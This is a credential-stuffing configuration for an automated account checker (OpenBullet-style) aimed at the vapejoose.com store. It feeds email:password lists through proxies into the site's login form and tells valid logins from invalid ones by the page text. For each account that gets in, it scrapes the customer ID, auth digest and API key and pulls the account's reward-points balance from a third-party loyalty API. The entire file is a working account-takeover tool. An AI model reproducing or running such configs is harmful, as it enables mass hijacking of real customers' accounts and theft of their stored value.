[SETTINGS]
{
  "Name": "Vapejoose.com",
  "SuggestedBots": 100,
  "LastModified": "2018-06-19T04:57:07.2259542+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.vapejoose.com/account/login" AutoRedirect=TRUE 
  CONTENT "form_type=customer_login&utf8=%E2%9C%93&customer%5Bemail%5D=<USER>&customer%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://www.vapejoose.com/account/login" 
  HEADER "Origin: https://www.vapejoose.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Invalid login credentials." 
REQUEST GET "https://www.vapejoose.com/account" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "My Reward Points" 
PARSE "<SOURCE>" LR "data-customer-auth-digest=\"" "\"" Recursive=FALSE -> VAR "DIGEST" "" "" 
PARSE "<SOURCE>" LR "var meta = {\"page\":{\"customerId\":" "}};" Recursive=FALSE -> VAR "CID" "" "" 
PARSE "<SOURCE>" LR "data-channel-api-key=\"" "\"" Recursive=FALSE -> VAR "APIKEY" "" "" 
REQUEST GET "https://cdn.sweettooth.io/v1/storefront_js/init?callback=stInitCallback&external_customer_id=<CID>&channel_api_key=<APIKEY>&customer_auth_digest=<DIGEST>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "\"points_balance\":" ",\"" Recursive=FALSE -> CAP "POINTS" "" "" 
